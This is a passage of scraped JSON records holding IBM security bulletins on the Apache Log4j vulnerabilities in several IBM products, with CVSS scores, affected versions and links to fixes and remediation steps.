"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-20T19:29:59", "type": "ibm", "title": "Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-20T19:29:59", "id": "990B694F8FEB56054D99331B4B4370CE96BC2A4FD7C4E2B75B5E537A91E83D24", "href": "https://www.ibm.com/support/pages/node/6528388", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:07", "description": "## Summary\n\nThere are Remote Attack Vulnerabilities in Apache Log4j (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105) which is used by IBM Engineering Lifecycle Optimization - Publishing (PUB) and Rational Publishing Engine (RPE) Knowledge Center for logging . The fix includes upgrade to Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Engineering Lifecycle Optimization - Publishing (PUB)| 7.0.2 \nIBM Engineering Lifecycle Optimization - Publishing (PUB)| 7.0.1 \nIBM Engineering Lifecycle Optimization - Publishing (PUB)| 7.0 \nRational Publishing Engine (RPE)| 6.0.6.1 \nRational Publishing Engine (RPE)| 6.0.6 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin.**\n\nThe Knowledge Center Component for a Locally installed Help Server (KCCI) that is (optionally) installed and configured for the following products: **IBM Engineering Lifecycle Optimization - Publishing (PUB) **(7.0,7.0.1,7.0.2) and **Rational Publishing Engine (RPE) **(6.0.6, 6.0.6.1) will need to be updated. Find the version corresponding to your offering click the link and follow the instructions to remediate your offering.\n\n * [Rational Publishing Engine (6.0.6](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Rational+Publishing+Engine&release=6.0.6&platform=Windows&function=fixId&fixids=Knowledge-Center-Update-V2-RPE-Publishing&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"Rational Publishing Engine 6.0.6\" ))\n * [Rational Publishing Engine (6.0.6.1](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm~Rational&product=ibm/Rational/IBM+Rational+Publishing+Engine&release=6.0.6.1&platform=Windows&function=fixId&fixids=Knowledge-Center-Update-V2-RPE-Publishing&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"Rational Publishing Engine 6.0.6.1\" ))\n * [IBM Engineering Lifecycle Optimization - Publishing (7.0, 7.0.1, 7.0.2)](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Lifecycle+Optimization+-+Publishing&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-V2-RPE-Publishing&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"IBM Engineering Lifecycle Optimization - Publishing \\(7.0, 7.0.1, 7.0.2\\)\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T20:44:45", "type": "ibm", "title": "Security Bulletin: IBM Engineering Lifecycle Optimization - Publishing is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, ) and denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-13T20:44:45", "id": "08FF14BF18D2D8DEA2BCD9900A4BED9C481C9700F7CF99B6CD1B3F7EDA9C3865", "href": "https://www.ibm.com/support/pages/node/6540672", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:23", "description": "## Summary\n\nIBM Sterling External Authentication Server is vulnerable to an arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). The fix includes Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling External Authentication Server| 6.0.3 \nIBM Sterling External Authentication Server| 6.0.2 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Sterling External Authentication Server| 6.0.3| iFix 01 Plus Build 141| [Fix Central - 6030](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther+software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling External Authentication Server| 6.0.2| iFix 04 Plus Build 214| [Fix Central - 6020](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther+software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \n \nThe [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) link points to a fix called SSP-SEAS-log4j-2.17.1-jars-for-CVE-2021-44832 which supplies the jars and instructions to replace them. This fix remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T17:09:05", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Sterling External Authentication Server (CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T17:09:05", "id": "4AF3F2925FA2FAC4247303F748E1EABFA2DFEF4045F7C3DA1E06B8C833F40639", "href": "https://www.ibm.com/support/pages/node/6538684", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:28", "description": "## Summary\n\nThere are Remote Attack Vulnerabilities in Apache Log4j (CVE-2021-45105, CVE-2021-45046, CVE-2021-44832) which affect the Knowledge Center Component (KCCI) which may optionally be installed by IBM Engineering Requirements Management DOORS. This fix upgrades the Knowlege Center component to a version that does not rely on or use Log4j.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Engineering Requirements Management DOORS| 9.6.1.7-9.6.1.11, 9.7-9.7.0.1, 9.7.1, 9.7.2-9.7.2.2 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin.**\n\nNote: This security bulletin supersedes: <https://www.ibm.com/support/pages/node/6527328> \n\n\nThe Knowledge Center Component (KCCI) for a Locally installed Help Server that is (optionally) installed and configured for the following products will need to be updated: \n\n * IBM Engineering Requirements Management DOORS: 9.6.1.7 - 9.6.1.11\n * IBM Engineering Requirements Management DOORS: 9.7 - 9.7.0.1\n * IBM Engineering Requirements Management DOORS: 9.7.1\n * IBM Engineering Requirements Management DOORS: 9.7.2 - 9.7.2.2\n\n \n \n**Remediation/Fixes** \n\n\nClick the [Link](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Requirements+Management+DOORS&release=All&platform=All&function=fixId&fixids=9.7.2.5-DOORS-fixpack&includeRequisites=1&includeSupersedes=0&downloadMethod=http&login=true> \"Link\" ) to download the patch. Follow the following procedure to remediate. \n \n\n\n \n**Procedure:**\n\n \n1\\. Download the updated IBM Engineering Requirements Management DOORS Server Windows installer \nfrom the link identified above. \n2\\. Unzip the file and install the server setup.exe on a temporary Windows machine. \n3\\. Find the updated KC_CI.zip that is apart of the temporary install \n\\- Temp Location : \n\n_C:\\Program Files (x86)\\IBM\\Rational\\DOORS\\9.7.2.5\\Server\\ibm\\Rational\\DOORS\\9.7\\kcci_install_ \n4\\. Next, update your existing server Windows kcii_install dir \n\n\n\\- For IBM Engineering Requirements Management DOORS **9.6.*** \n_C:\\Program Files (x86)\\IBM\\Rational\\DOORS\\&lt;version&gt;\\Server\\ibm\\Rational\\DOORS\\9.6\\kcci_install_ \n\\- For IBM Engineering Requirements Management DOORS **9.7.*** \n_C:\\Program Files (x86)\\IBM\\Rational\\DOORS\\&lt;version&gt;\\Server\\ibm\\Rational\\DOORS\\9.7\\kcci_install_ \n5\\. Delete the old contents of the kcci_install directory \n6\\. Copy KC_CI.zip (129 MB) version 2.0 into that directory and unzip\n\n7\\. Next click on the KCCI contents [link](<https://download.boulder.ibm.com/ibmdl/pub/software/rationalsdp/documentation/kcci_content/doors_help/> \"link\" ) for the DOORS Help. Download the help contents zip for **_version 9.7.2 or higher_** and unzip it into the new kcci_install directory.\n\n**Additional Help**\n\nFor further information on installing IBM Engineering Requirements Management DOORS on your computer, review the following [information link](<https://www.ibm.com/docs/en/ermd/9.7.2?topic=applications-installing-help-your-computer> \"information link\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-28T16:56:55", "type": "ibm", "title": "Security Bulletin: IBM Engineering Requirements Management DOORS is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, ) and denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-28T16:56:55", "id": "05BBDE1FB03AC43275CE3464D408E5E21E63D250E7B0CF0E90D314FBD5991752", "href": "https://www.ibm.com/support/pages/node/6540618", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:46", "description": "## Summary\n\nApache Log4j is used by API Connect as part of its logging and analytics infrastructure. The fix includes Apache Log4j 2.17.1 which addresses CVE-2021-45105, CVE-2021-45046 and CVE-2021-44832.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAPI Connect| V10.0.0.0 - V10.0.4.0 \n---|--- \nAPI Connect| V10.0.1.0 - V10.0.1.5 \nAPI Connect| V2018.4.1.0 - 2018.4.1.17 \nAPI Connect| V5.0.0.0 - 5.0.8.12 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\n**Affected Product**| **Addressed in VRMF**| **Remediation / Fix** \n---|---|--- \n \nIBM API Connect \n\nV10.0.1.0 - V10.0.4.0\n\n| V10.0.4.0-ifix1| \n\nAddressed in IBM API Connect V10.0.4.0-ifix1\n\nThe Analytics component is impacted.\n\nFollow this link and find the appropriate package.\n\n<https://www.ibm.com/support/pages/node/6541170> \n \nIBM API Connect \n\nV10.0.1.1 - V10.0.1.5\n\n| V10.0.1.5-ifix4| \n\nAddressed in IBM API Connect V10.0.1.5-ifix4\n\nThe analytics component is impacted.\n\nFollow this link and find the appropriate package.\n\n<https://www.ibm.com/support/pages/node/6540696> \n \nIBM API Connect \n\nV2018.4.1.0 - 2018.4.1.17\n\n| V2018.4.1.17-ifix2| \n\nAddressed in IBM API Connect V2018.4.1.17-ifix2\n\nhe Analytics component is impacted.\n\nFollow this link and find the appropriate package.\n\n<https://www.ibm.com/support/pages/node/6478999> \n \nIBM API Connect\n\nV5.0.0.0 - V5.0.8.12\n\n| V5.0.8.13| \n\nAddressed in IBM API Connect V5.0.8.13\n\nThe Analytics and Management components are impacted.\n\nFollow this link and find the appropriate package.\n\n<https://www.ibm.com/support/pages/node/6538964> \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T00:06:28", "type": "ibm", "title": "Security Bulletin: API Connect is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105, CVE-2021-45046 and CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-19T00:06:28", "id": "256D7977365CD514F903FC0D0240FD89D47444B078D35EB3DA4DD54AAC8C8661", "href": "https://www.ibm.com/support/pages/node/6541728", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:54:43", "description": "## Summary\n\nIBM Cognos Analytics is affected by security vulnerabilities. Apache Log4j is used by IBM Cognos Analytics as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j vulnerabilities: CVE-2021-45105 and CVE-2021-44832. IBM Cognos Analytics has upgraded Apache Log4j to v2.17.1 Please note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Analytics 11.2.x\n\nIBM Cognos Analytics 11.1.x\n\nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n## Remediation/Fixes\n\nIf you have one of the listed affected versions, it is strongly recommended that you apply the most recent security update. \n\n\nTwo links have been provided for each Interim Fix. The majority of clients will access the Interim Fix via the link under Fix Version. For clients who have IBM Cognos Analytics by way of another product such as IBM Planning Analytics, IBM Cognos Controller, IBM OpenPages, etc. you will access the Interim Fix via the link under the Bundled Customers.\n\nAffected Version\n\n| \n\nFix Version\n\n| \n\nBundled Customers \n \n---|---|--- \n \nIBM Cognos Analytics 11.2.x\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3](<https://www.ibm.com/support/pages/node/6525670>)\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.2.1-BA-CA-BNDL-IF003:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"IBM Cognos Analytics 11.2.1 Interim Fix 3 \\(Bundled\\)\" ) \n \nIBM Cognos Analytics 11.1.x\n\n| [IBM Cognos Analytics 11.1.7 Interim Fix 9](<https://www.ibm.com/support/pages/node/6525664> \"\" ) | [IBM Cognos Analytics 11.1.7 Interim Fix 9 (Bundled)](<https://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.1.7-BA-CA-BNDL-IF009:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc>) \n \nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5](<https://www.ibm.com/support/pages/node/6525666>)\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.0.13-BA-CA-BNDL-IF005:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"IBM Cognos Analytics 11.0.13 Interim Fix 5 \\(Bundled\\)\" ) \n \n \nPlease note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\n \nThe required remediation will be applied during the standard monthly IBM Cognos Analytics on Cloud maintenance window January 15, 2022\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Analytics team have developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers.\n\nThe single version of the patch is applicable to IBM Cognos Analytics versions 11.0.6 to 11.0.13 FP4, 11.1.x and 11.2.x. \n\nThe log4jSafeAgent file that is provided for Cognos Analytics modifies the class byte code at the Java startup time. It removes the vulnerable JNDI lookup, and enforces the StrSubstitutor recursion limit without altering the installed product.\n\nIt effectively rewrites the \u201corg/apache/logging/log4j/core/lookup/JndiLookup\u201d class to remove its content during IBM Cognos Analytics start up.\n\nTo get the patch and detailed instructions, click this link: [log4jSafeAgent](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=Cognos&product=ibm/Information+Management/Cognos+Analytics&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-MP-log4jFix&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"<log4jSafeAgent2021>\" ) \n \nBundle Customers can use the following link: [log4jSafeAgent Bundled](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-BNDL-log4jFix:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"<log4jSafeAgent2021 Bundled>\" )\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-20T19:28:52", "type": "ibm", "title": "Security Bulletin: IBM Cognos Analytics: Apache Log4j 